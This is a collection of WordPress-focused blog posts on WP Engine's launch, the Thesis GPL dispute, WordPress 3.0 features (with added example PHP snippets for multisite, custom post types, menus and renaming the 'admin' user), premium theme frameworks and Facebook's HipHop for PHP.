Since I moved to Austin, I have been very coy about what I’ve been up to. There’s a reason for that and today I can tell you all about it. Especially since my good friend Marshall over at ReadWriteWeb already has. :-)

It was very interesting. Back in May, my friend Pete Jackson, who works for Intridea, started making a point of introducing me over Twitter to one of his friends in whatever city I happened to be travelling in at that moment.

It was in this way that I met Sean Cook, the manager of mobile integrations at Twitter in San Francisco and, when I was in Austin visiting in May, he made sure that I met Aaron Scruggs of Other Inbox who has since become a pretty good friend.

It was after that meeting with Scruggs in May that he connected me to one of the smartest guys I’ve ever met, Jason Cohen. Jason is one of the two founding partners at Capital Thought, an Austin-based incubator. Jason has also built several companies and parlayed two of those into healthy exits. I’ve come to have a tremendous amount of respect for his technical and business savvy.

Jason described to me the concept for a business that he was working on along with Cullen Wilson. A premium, WordPress platform that would cater specifically to the customers who want to make sure their blog is always taken care of from a maintenance and upgrade perspective, but also would offer significant value adds that nobody else is providing in a WordPress-optimized environment.

I’ll get to what all those buzzwords mean in a minute. Stick with me.

We started talking about me joining up with them to take this idea to the bank. Shortly after moving down here to Austin, I joined the team and we’ve been working hard over the last couple months to get to the point where we could reliably take on new customers and talk about our idea publicly.

Today is that day.

So, you’re still probably wondering what the hell WP Engine is and why it’s important, right?

Let’s talk security for a minute. There have been significant security “incidents” in recent months. Most people on the outside simply see “WordPress hacked! WordPress hacked!” – I’m looking at you Chris Brogan, Robert Scoble and Frank Gruber (Techcocktail). In the WordPress community, we know the real issues in these cases were not WordPress but the hosts that the blogs were on. Still, people saw WordPress hacked.

We take this very seriously and have partnered with a provider that has multiple levels of security including Intrusion Detection Systems (IDS) outside of our boxes. We have gone to great lengths to keep our customers connecting to us in very secure ways and keep a close eye on the activity happening on our boxes. This is all very important because if an attacker could get through our outside defenses, chances are they couldn’t do anything malicious without us knowing about it.

Our infrastructure is also built with optimization and blazing fast speed as a core expectation and deliverable. We don't overload servers and have the means to see potential performance problems before they arrive. With our dual nginx-apache server configuration, we are able to handle sustained high-volume traffic as well as the spikes that are the pain point for WordPress bloggers who suddenly get a story featured on a prominent site.

For the people who claim WordPress doesn’t scale… I call bullshit. We believe we know exactly how to make WordPress scale.

But we’re not just a hosting company. If we were that, we would be our competitors. We are also working on additional features such as “Curated Plugins” which are plugins that are entirely open source, that are popular or in demand from our customers and have been vetted from a security standpoint. These are plugins that we support 100%. This does not preclude customers from using other non-supported plugins, and we don’t dictate what bloggers can have on their blog as some of the other hosted WordPress solutions do. We just say, “Hey, if you use one of these, we’re gonna have your back”.

Other things that make WP Engine different:

  • 3 Smart guys supporting customers personally
  • A “Staging” area for one-click deployments and testing
  • We give back to the community. In fact, I made sure that I could work on the WordPress open source project, write the second edition of my book, and that much of our work will be returned to the community. Code is a commodity. The people and service behind the code is not.

We are not perfect yet, nor do we claim to be. We are a young company and have hundreds of things still to do and hopefully learn from. We are in an "invite only" mode at this time as much of the stuff we are doing and want to do is still not ready. But we are open for business and taking customers. And for $50/mo [1] for a dedicated WordPress environment that has optimization, speed and security plus the flexibility of you doing your own thing with a safety net… it's a steal, really.

Photo used with permission by Donncha O Caoimh

Notes:

  1. For most customers

Impending Legal Precedent for GPL Licensing?

If you pay attention to the WordPress world, you might be aware that a landmark lawsuit is likely to be filed. I say landmark expecting that both sides will litigate and not settle – something that is desperately needed in the United States to validate and uphold the scope of the GPL license.

WordPress is a free software that is licensed under GPLv2 – a license that was created in 1991 to protect the ability of developers and users to gain access to software, create derivative works and distribute the copyrighted code in its entirety under the same protective license.

One of the tenets of the GPL that is argued prolifically is that derivative works include works that "link" into other works via APIs and dependencies (such as library dependencies). According to the argument, software that is considered a derivative work must retain the same licensing as the GPL'd work that it links into.

There are many legal (and non-legal) minds who would like to interpret this license in a variety of ways. There have been notable legal cases around the GPL in the United States, but all (to the best of my knowledge) have settled prior to litigation. One of these cases, Progress Software v MySQL AB, revolved around a product called Nusphere that was bundled with MySQL but was proprietary and incompatible with the GPL. The judge refused to grant summary judgement and eventually MySQL simply did not bundle the proprietary software.

Another case avoided judicial decision – and thus avoided judicial precedence. That case, Free Software Foundation v. Cisco, was settled out of court with a donation from Cisco and a pledge of commitment to the GPL.

Today, a major incident happened that has been brewing for years now. Due to an unfortunate incident in which source code for the popular Thesis theme for WordPress (from DIYThemes) was compromised by a hacker, tempers started boiling over. Matt Mullenweg, founder of WordPress and the public face of Automattic, the largest company behind the WordPress project, ended up on a live interview alongside Chris Pearson of DIYThemes.

Matt suggests (I think accurately) that a theme that is provided for WordPress (it does not work without WordPress) is a derivative work and requires GPL compatibility. He also suggests (accurately, I think) that GPL compliance would only enhance DIYTheme’s business as evidenced by countless other proprietary software providers who have gone open source.

Not to mention that a license does insinuate adherence to legal requirements provided by the license. If you don’t agree to the terms of the license, you’re not permitted to use the software. Makes sense.

Chris’ defense is that Thesis is completely independent of WordPress (which I question the rationality of since the software cannot exist absent of WordPress). He believes he has a business and economic right to maintain a license that is at odds with WordPress’ GPL license.

So my editorial question is… compliance with the WordPress GPL license is optional but compliance with the Thesis license is not? Hmmm.

Matt, in so many words, has already indicated that there will be a lawsuit that comes out of this. This could be landmark as, if the suit were not settled, it could define the parameters of open source software creation, usage and distribution reaching into every aspect of our life. Who uses Firefox? Yeah… depending on the outcome, that could be affected.

In a perfect world, the two sides reach an amicable solution. Thesis is popular, but it is not the only game in town. However, the second best solution is a legal precedent governing GPL software.

So we stand by and wait.

Image by Joe Gratz

10 Things You Need to Know About WordPress 3.0

By now, you’ve probably heard the hype about WordPress 3.0. You may have even seen the WordPress 3.0 preview webinar I did not too long ago.

This is somewhat of an odd release as I can’t point to 10 individual new features in WordPress. However, I can point to several very large new features that have been hyped enough already. Inside each of these new major things, there are several components. So, let me break the ten things down into three groups. We’re a little behind schedule (thanks to Jane Wells’ cat below) but I think the wait is worth it.

The Merge! WordPress and WordPress Multisite Together At Last

Back at WordCamp San Francisco last year (which is happening this weekend and I will be at), Matt Mullenweg announced that WordPress and WordPress MU would be merging into one singular software package. I covered that shortly after the announcement. The reasoning was that all of the WordPress core was already in sync with WordPress MU and MU simply had a bit more functionality added to it. Most of the code is the same. Why split resources and developers?

WordPress 3.0 is where this merge takes place.

Language Changes

While this is not a new feature in WordPress, existing WordPress MU users may find themselves “thrown” by new terminology involved in WordPress 3.0. In WordPress MU, we had the concept of a “Site” which was an installation of WordPress MU. Within a Site you could have one or more blogs.

In WordPress 3.0, we have the concept of a Network (which was a Site in WordPress MU) and under a Network, we have Sites (which were Blogs). Sites are Blogs. Networks are Sites. Site Admins in WordPress MU are now called Super Admins in WordPress 3.0. Making things complicated, we don’t call it WordPress MU anymore. We call it putting WordPress into Multisite mode. Complicated, eh? New WordPress Core Developer, Andrew Nacin, describes this terminology nightmare.

Enabling WordPress for Multisite Mode

Users who expect to simply install WordPress and get all the benefits of Multisite out of the gate are bound to be confused by the fact that there is no apparent “switch” to turn it on. When you install WordPress 3.0, it will be in standard WordPress mode. In order to flip the switch, you have to add a new constant to your wp-config.php file. It’s easy, just add the following and save:

define('WP_ALLOW_MULTISITE',true);

Once this is done, you’ll find a new menu item called “Network” in your Admin under Tools. Visit this page, enable Multisite and follow the instructions. You may need to add new configuration settings to your .htaccess file and wp-config.php, but WordPress will provide these lines for you to copy and paste.

Note: As with WordPress MU, you may need to make server level system changes to enable WordPress to handle subdomains. This is not an easily solved problem and caused heartburn with MU users and will likely continue to cause heartburn with WordPress 3.0 users as well.
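For readers who want to know what the copy-and-paste step above produces, here is an added example of the wp-config.php fragment for a subdirectory-style network. This is not text from the original post; the domain and paths are constructed placeholders, and the exact lines WordPress generates for your install depend on the choices you make on the Tools > Network screen.

```php
<?php
// Step 1: the switch that exposes Tools > Network in the admin.
define( 'WP_ALLOW_MULTISITE', true );

// Step 2: the constants the Network screen hands back once you enable Multisite.
// They must sit ABOVE the "/* That's all, stop editing! */" line in wp-config.php.
define( 'MULTISITE', true );

// false = sites live at example.com/site-name/ (no DNS or vhost work needed);
// true  = sites live at site-name.example.com, which is where the server-level
//         wildcard subdomain configuration mentioned in the note above comes in.
define( 'SUBDOMAIN_INSTALL', false );

$base = '/';                                           // URL prefix of the network
define( 'DOMAIN_CURRENT_SITE', 'example.com' );       // constructed placeholder domain
define( 'PATH_CURRENT_SITE', '/' );
define( 'SITE_ID_CURRENT_SITE', 1 );                   // the network's own ID
define( 'BLOG_ID_CURRENT_SITE', 1 );                   // the main site's ID within it
```

Treat DOMAIN_CURRENT_SITE as the value that decides which host the network answers for; if it does not match the host your users actually visit, logins and redirects on the network break in confusing ways, so copy it exactly as WordPress generates it rather than retyping it.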

Upgrading from WordPress or WordPress MU 2.9 or below

A lot of people, including myself, were concerned about upgrade paths when the Merge was announced. I should have known not to be concerned. WordPress has taken great care for years to ensure backwards compatibility and we’ve done the same thing here. If you’re on WordPress or WordPress MU, you will be able to install WordPress 3.0 and upgrade seamlessly. WordPress MU installs will become WordPress 3.0 with Multisite enabled and single installs of WordPress will retain all the benefits of standard installs of WordPress.

WordPress as a CMS: Custom Post Types and Taxonomies

Developers are already very excited about the new APIs available in WordPress 3.0. Specifically, Custom Post Types (which received initial support in WordPress 2.9). This is a very important set of new features because it finally – finally! – brings CMS support to WordPress. For the first time, we don’t have to simply pretend that WordPress is a CMS…. it can have all the CMS qualities of a Drupal or Joomla.

Custom Post Types

We initially talked about custom post types in WordPress 2.9 but in WordPress 3.0, the feature is fully vetted and able to be utilized. With a simple function in a plugin or theme, developers can create new post types (such as film reviews, podcasts or FAQs), provide entirely familiar UI (similar to posts and pages), etc.

You can find all the possible options under register_post_type() in the wp-includes/post.php file.

Custom Taxonomies

Going hand in hand with custom post types, you can also create custom taxonomies. Taxonomies are bits of metadata and most people think of them in terms of ‘categories’ and ‘tags’. Built into WordPress already are three taxonomies – categories and tags (which most people think about) and link categories. The difference, from a technical perspective, between tags and categories is hierarchy. Categories have hierarchy so a category can have a child category, etc. Tags are flat and have no hierarchy.

You can create custom taxonomies with the register_taxonomy() function which will create UI automatically. All the options for custom taxonomies can be found in the wp-includes/taxonomy.php file.

Note: I have created a plugin and made it available for download that demonstrates how to use custom taxonomies and post types.
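Because the two sections above only name register_post_type() and register_taxonomy() without showing a call, here is an added example of a small plugin that registers a “Film Review” post type and a hierarchical “Genre” taxonomy for it. This is illustrative code written for this page, not the plugin mentioned in the note above; the post type, taxonomy and function names are invented for the example.

```php
<?php
/*
Plugin Name: Film Reviews (added example)
Description: Registers a film_review post type and a genre taxonomy. Example code, not the author's plugin.
*/

// Post types and taxonomies must be registered on every request, so hook 'init'
// rather than calling the functions at file load time.
add_action( 'init', 'example_register_film_reviews' );

function example_register_film_reviews() {
    register_post_type( 'film_review', array(
        'labels' => array(
            'name'          => 'Film Reviews',
            'singular_name' => 'Film Review',
            'add_new_item'  => 'Add New Film Review',
            'edit_item'     => 'Edit Film Review',
        ),
        'public'          => true,  // front-end queries plus the familiar edit screens in the admin
        'has_archive'     => true,  // gives you a /film-reviews/ archive
        'rewrite'         => array( 'slug' => 'film-reviews' ),
        'supports'        => array( 'title', 'editor', 'excerpt', 'thumbnail' ),
        // Reuse the built-in 'post' capabilities and let WordPress map edit/delete
        // checks per post: a Contributor can draft a review but not publish one,
        // exactly as for ordinary posts. No new privileges are introduced.
        'capability_type' => 'post',
        'map_meta_cap'    => true,
    ) );

    register_taxonomy( 'genre', 'film_review', array(
        'labels' => array(
            'name'          => 'Genres',
            'singular_name' => 'Genre',
        ),
        'hierarchical' => true,  // category-like (parent/child); false would make it tag-like (flat)
        'public'       => true,
        'show_ui'      => true,  // WordPress builds the admin screens automatically
        'rewrite'      => array( 'slug' => 'genre' ),
    ) );
}

// Pretty permalinks are cached as rewrite rules. Flush them once when the plugin
// is activated so /film-reviews/ and /genre/... resolve without a manual
// visit to Settings > Permalinks.
register_activation_hook( __FILE__, 'example_film_reviews_activate' );

function example_film_reviews_activate() {
    example_register_film_reviews();
    flush_rewrite_rules();
}
```

The capability settings are the part worth thinking about when you model a site as a CMS: a post type that is registered with its own capability_type but without assigning those capabilities to any role is invisible even to administrators, while one that reuses ‘post’ inherits whatever your role configuration already allows.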

User Facing Enhancements

There are two major user facing enhancements. When I say two major user facing enhancements, I’m not being sensational. These things are killer and I think you’ll be excited.

Menus

Wow, this has been a controversial new feature. Mostly because it almost didn’t make it into WordPress 3.0 and users have really, really wanted it. Those familiar with the navigation creator in many of the WooThemes will be familiar with the new Menus feature in WordPress. This is because we worked early on with Woo to adopt their premium theme feature, which was very good, into the WordPress core (a fantastic case study on how premium theme developers can work directly with the WordPress core team).

The idea is really simple: Compose any menu with any hierarchy out of category archives, pages and custom links. Once a menu is created and saved, theme developers can enable support for this feature with the following line:

add_theme_support( 'menus' );

Dropdowns are automatically created and semantic CSS markup allows style modifications easily. You can also create multiple menus (let’s say, a secondary navigation piece) and use them as sidebar widgets or hardcode them directly into a theme.

Default theme… no, no default theme… no, new default theme!

Well, you know all those free themes over on the theme repository? Yeah, most of them are heavily modified versions of Kubrick, the default theme for WordPress. Theme people would take the code base, modify it and make it their own. They might upload it to the theme repository. Problem is, they would not be updated with the new stuff that would go into Kubrick. That and Kubrick sucked as a theme.

Well, as of WordPress 3.0, there is no more Kubrick. There also is no more Classic theme. Now, we have a new theme called twentyten. Yes, that means next year, we’ll have twentyeleven.

Twentyten is a very complex theme. It should not just be duplicated and hacked up. We want themers to adopt the child theme method of doing things. This is important because as changes go into twentyten, your child theme will inherit those changes. Here’s a good starter for how to build child themes.

Note: If you are upgrading from previous versions of WordPress and have a child theme based on Kubrick, don’t delete the default theme. If you do, you can still grab the theme from the theme repository.

WordPress Admin Enhancements

The WordPress Administrative interface has also seen enhancements. Jane Wells is our usability expert in the WordPress developers group and has done quite a lot of work. Minor enhancements include an all light-grey style color scheme (as opposed to the dark grey header bar). This does seem to be better on the eyes. Additionally, the themes interface also has a new “tabbed” interface.

Custom Backgrounds

Built into twentyten is a new custom background feature. The cool thing is, theme developers can include this feature in their own theme. Simply adding this function to your theme functions.php will add a new menu item to your Appearance menu that allows for quick modification of the background image on the blog.

add_custom_background();
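The Menus section and the Custom Backgrounds section above each show the one-line switch but not where it lives or how the menu reaches the page. Here is an added example of a theme’s functions.php doing both, together with the template call that prints the menu. This is illustrative code for this page, not code from twentyten or from any theme the post mentions; the menu location name and function names are invented.

```php
<?php
// functions.php of a hypothetical theme (added example).

// Theme features are declared on 'after_setup_theme', which runs before the
// admin decides which Appearance screens to show.
add_action( 'after_setup_theme', 'example_theme_setup' );

function example_theme_setup() {
    // Registering a menu location also registers 'menus' theme support, so
    // Appearance > Menus appears. Each location is a slot a saved menu can be
    // assigned to; a second one (e.g. 'footer') would give you a secondary nav.
    register_nav_menus( array(
        'primary' => 'Primary Navigation',
    ) );

    // Adds Appearance > Background, the WordPress 3.0 API mentioned above.
    add_custom_background();
}

// Called from header.php where the navigation should appear.
function example_print_primary_menu() {
    wp_nav_menu( array(
        'theme_location' => 'primary',
        'container'      => 'div',          // wrapper element around the <ul>
        'container_class'=> 'primary-nav',
        'menu_class'     => 'menu',         // class on the <ul>; sub-menus get the 'sub-menu' class
        'depth'          => 2,              // limit the dropdown to one nested level
        // Until an administrator assigns a menu to this location, print nothing
        // rather than falling back to wp_page_menu() and listing every page.
        'fallback_cb'    => false,
    ) );
}
```

The markup wp_nav_menu() emits carries the classes the post refers to (current-menu-item, menu-item-has-children and so on), which is what makes dropdown styling a CSS-only job; the “Custom Links” entries an editor adds are stored and re-escaped by WordPress on output, so a theme should print the menu through this call rather than echoing stored URLs itself.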

The Extras

Of course, not everything can fit into the three main areas of feature adds. Some are important and just don’t fit anywhere else.

Admin Username

Many of the security problems that have occurred in WordPress’ history have been a result of the administrative username being admin. This has not been selectable or changeable without hacking the database and changing the admin username there.

In WordPress 3.0, the username can now be selected on install. Here’s a hint…. don’t name it admin. :)
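For sites installed before 3.0, the post describes the only fix as editing the database by hand. Here is an added example of doing that check and rename from a small plugin through the WordPress database API instead of a raw query; it is illustrative code for this page, not a WordPress feature, and the function names are invented.

```php
<?php
/*
Plugin Name: Admin Username Check (added example)
Description: Warns when a user literally named "admin" exists and offers a guarded rename. Example code, not part of WordPress.
*/

// Surface the problem where an administrator will see it.
add_action( 'admin_notices', 'example_warn_admin_username' );

function example_warn_admin_username() {
    if ( current_user_can( 'manage_options' ) && username_exists( 'admin' ) ) {
        echo '<div class="error"><p>A user account named <code>admin</code> exists. '
           . 'Login attempts commonly guess this name first; rename the account.</p></div>';
    }
}

// Rename the "admin" account to $new_login. Returns true on success or a WP_Error
// explaining why nothing was changed. Uses $wpdb->update(), which builds a
// prepared statement, instead of hand-written SQL against wp_users.
function example_rename_admin_user( $new_login ) {
    global $wpdb;

    $new_login = sanitize_user( $new_login, true );
    if ( ! validate_username( $new_login ) || 'admin' === $new_login ) {
        return new WP_Error( 'invalid_login', 'Pick a valid username other than "admin".' );
    }
    if ( username_exists( $new_login ) ) {
        return new WP_Error( 'exists', 'That username is already taken.' );
    }
    if ( ! username_exists( 'admin' ) ) {
        return new WP_Error( 'missing', 'There is no account named "admin".' );
    }

    // user_nicename is the URL slug shown on author archives; keep it consistent
    // so the old name does not leak through /author/admin/.
    $rows = $wpdb->update(
        $wpdb->users,
        array( 'user_login' => $new_login, 'user_nicename' => sanitize_title( $new_login ) ),
        array( 'user_login' => 'admin' ),
        array( '%s', '%s' ),
        array( '%s' )
    );

    return ( 1 === $rows ) ? true : new WP_Error( 'db', 'The rename did not apply.' );
}
```

The rename is deliberately not wired to any request handler here: run it once from a trusted context (for example a one-off admin page protected by a nonce and a capability check), then remove the plugin. The notice alone is the part worth leaving in place.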

For a complete list of expected changes, see this Codex page.

WordPress 3.0 Preview Webinar

Yesterday, the iThemes folks graciously hosted me for a webinar. I had the opportunity to demonstrate some of the more anticipated features of WordPress 3.0 (due out next month). In the process, I also expressed some of the philosophies in the WordPress community around contributing and shaping the most popular publishing platform on the web.

Some of my answers to questions late in the webinar are directed specifically toward the fringe elements of the community who approach the project from a combative perspective choosing to take pot shots at people and Automattic specifically while never doing a damn thing to push the platform forward. While I’ve left names out of the webinar and this post, the message is clear: if you want to have credibility in the community, learn how to be constructive and own the features and elements you want to see.

But the webinar was not a political statement. In fact, most of it was a hands on demonstration of the new twentyten default theme in WordPress 3.0, the custom taxonomy and post type features which bring WordPress into approximate parity with other content management systems, as well as a preview of “The Merge” – the combination of WordPress MU and WordPress.

Thanks again to the folks over at iThemes. If you missed the Webinar, here it is. Sorry, iPhone and iPad users…. it’s Flash. ;)

WordPress 3.0 Preview with Aaron Brazell from WebDesign.com on Vimeo.

Battle of the Titans: Premium Theme Framework Smackdown

I have provided updates for the problems reported with each theme on their pages in this report. We can provide one update per framework as long as something significant has changed (as in a new release of the theme).

For a few days now, I’ve been looking closely at the four major theme frameworks. There are many premium themes. I, in fact, for the time, am using one from Woo Themes that I’ve modified to fit here. However, there are only four that I see as worthy competitors among the elite theme frameworks.

I will be using affiliate links when referencing all of them just because, if you choose to use any of them based on this article, I don’t mind collecting a commission fee. This does not indicate my endorsement of any of them. In fact, quite the opposite. I expect you’ll find me to be a hard, but objective critic of all of them.

The four theme frameworks: Thesis 1.7, Headway 1.6.1, Genesis 1.1.1, and Builder 2.3.11.

Report Scope and Prism

When I went about gathering data on this post, I heard a lot of back and forth from those in the WordPress community about why they liked or disliked each of these themes. Some of the issues were restrictive licensing that flies in the face of the open society that is WordPress. Other things were lingering effects from the Great Premium Theme Pissing Matches™ of 2008. Still others were about how user-friendly the themes were for users. In this report, I put all of that aside and look strictly from the perspective of infrastructure, data, security and WordPress core feature support.

All metrics that have been taken were created equally via a local installation of WordPress (eliminating network latency), with no plugins installed, 10,000 blog posts and 10,000 pages. The data points were taken in the context of a stress test and may or may not reflect actual usage. However, large scale stress is something to be concerned with for any site that is large or plans to become large. How the server handles database transactions, and file load is an integral part of a long term strategy. Each theme was deployed with no configuration changes beyond default settings provided by the theme. The results are fascinating.

This is a seven page article so click through to each new page to read the analysis of each theme.

Photo by icantcu

HipHop, PHP, and the Evolution of Language

A lively little discussion developed over the past few days on the DC-PHP developers mailing list. We have a very active developers group here in the DC area – much larger than most cities, in fact. Part of what makes our group great is the diversity of background and experience that is in the group.

This was front and center over the past few days when one of our members, Hans, offered his opinions on Facebook’s new HipHop for PHP product. We have already expressed our intent to help make WordPress compliant with HipHop, something that will be beneficial to major WordPress sites like TechCrunch, Mashable, VentureBeat, WordPress.com, the NFL Blogs, the NY Times blogs, the Cheezeburger network (LOLcats, FAILBlog, etc) that carry large amounts of traffic. I hope to be able to consult with some of these organizations on moving into a HipHop system once my head is wrapped around it and WordPress is compliant.

Photo by Josh Hunter

Hans is an extraordinary developer. I have never met him personally, but his depth of knowledge on issues of security and scalability is downright frightening. He offered his own opinion of HipHop on the mailing list and so I’m going to pick on him a bit:

This HipHop thing is interesting, perhaps in much the same way as HipHop music: it feels like a hack. — And I mean that respectfully in both cases; I like hip-hop music, and appreciate how it pays homage to R&B roots, remixing/reinterpreting them, etc; and I think that the idea of taking one language and building it out to something else is also something I should support. After all, I’ve embroiled myself in code generation tools (e.g. Propel) that are operating on the same philosophical groundwork. But I also believe that there’s a general rule like “if you need code generation, there’s something wrong [in your design or in the tools you’ve chosen or …]” … so those tools also feel like hacks.

In all of life, there is an evolution that happens. One iteration of something becomes better with improvements over time. This has happened on a micro level inside PHP. Without PHP 3 there would be no PHP 4. Without PHP 4, there would be no PHP 5. Ben Ramsey talked about this evolution before Christmas.

Why is it a hack to improve upon the tools used with a language? Is it a hack to use Memcached with PHP? Is it a hack to run on nginx instead of Apache or to implement FastCGI? All of these are third party software or extensions outside of PHP. So how is HipHop any different?

That’s all fair, but I feel like the problem here is that somewhere a long, long time ago, Facebook *must* have realized that they were going to have scaling problems. Long before they started having a problem, someone *must* have thought “maybe a compile-at-runtime language isn’t the right solution here”. I guess to me this cross-compiler is just a public way to admit that PHP is not the right tool for the job, but they’re stuck with all these developers that only know PHP so it was somehow cheaper to engineer a way to change PHP to C++ than it was to retrain developers on C++ (or, probably more realistic, Java).

What follows is my response in that conversation, only slightly edited. While I appreciate, and always have appreciated, his frank, honest, high level view of PHP, web security, web applications, etc., he strikes me as somewhat naive and puritanical.

What I can say is *I*, along with dozens of other technology people in and out of DC, in and out of PHP, never look at our initial ideas as scaling ideas. We look at them as ideas and experiments to see if they have legs. In fact, I’d go so far as to say it is counter-productive to think about scale before thinking of conceivability (is that a word?).

There’s a reason why Rails (God help us) is popular. It’s a great prototyping tool. You stand up an app quickly and let it into the wild to see if it has legs. Does it go? What are the market influences? What are the pros and cons? Do we have to adjust?

After a concept is proven, then a solid dev team with solid tech leadership brings in their expertise to see if the idea can be built into something sustainable. As a sidebar, please take a read of Brad Feld’s very awesome post from a few years ago, “The first 25,000 Users are Irrelevant”.

My point is, it’s silly and a waste of resources for startup people to start thinking about how big they might get maybe 5 years down the road. I think you’d find out that, in most cases, successful technology, web-based companies happened by some dumb luck. Twitter. Facebook. Name-the-popular-app. Dumb luck.

Hey, I’d even argue that when too much comp-sci brain energy goes into an app, you get things like Wolfram Alpha. Cool. But useless. And not nimble enough to actually do the scaling necessary to need all that comp-sci engineering prowess.

Balance, my friend. Balance.

Facebook (and others) start with PHP because PHP is fairly ubiquitous and easy as pie to drop into production. However, there is a point of no return where you are committed to PHP and that’s where HipHop comes in.

Personally, I wish we had HipHop when I was at b5media. We had a ton of scaling problems with PHP and we were running fully clustered Apache servers (25 deep, if I recall), sharded MySQL across 6ish database servers, and we had massive I/O bottlenecks. We ran eAccelerator and Memcached and had squid-based load balancing and damn if Grey’s Anatomy or the Oscars didn’t pin our entire network on more than one occasion. What could have happened with an alternative to opcode caching? What could have happened if I had the resources to put into developing C++ binaries of our frequently used PHP libraries?

I’ll tell you. It would have rocked. We were already committed to PHP. We were already committed to WordPress. And when the company started, we were all volunteer resources. There was no assumption that our idea had legs or I think everyone on the team would have quit our jobs immediately and put everything into building that company. It took a year to get there.

This is, for better or for worse, the way companies get started in the real world.

Facebook's HipHop and What it Means to WordPress

This was originally posted on my company blog and reposted here for posterity.

By now, the news has hit the street about Facebook’s new PHP pseudo-compiler technology that is looking set to change the PHP world once again. It is called HipHop for PHP.

Here at Emmense, we build on PHP and more specifically, we build on WordPress. The PHP community as a whole continues to innovate the language and Facebook has been a longstanding member of that community. WordPress stands on the shoulders of those who have gone before, and there are certainly instances of large-scale installs of WordPress that could stand to use some acceleration.

It is our intention, here at Emmense, to support the Facebook HipHop methodology where appropriate. We will be exploring the use and implementation of this technology in the days and weeks to come and will be working to build solutions that leverage it in the WordPress world for our clients. Where possible, our work will be contributed back to the WordPress core.

While we expect that many more service providers will likely leverage this technology, we want to continue to lead in the WordPress community in an ever-open exchange of ideas between the PHP and WordPress communities.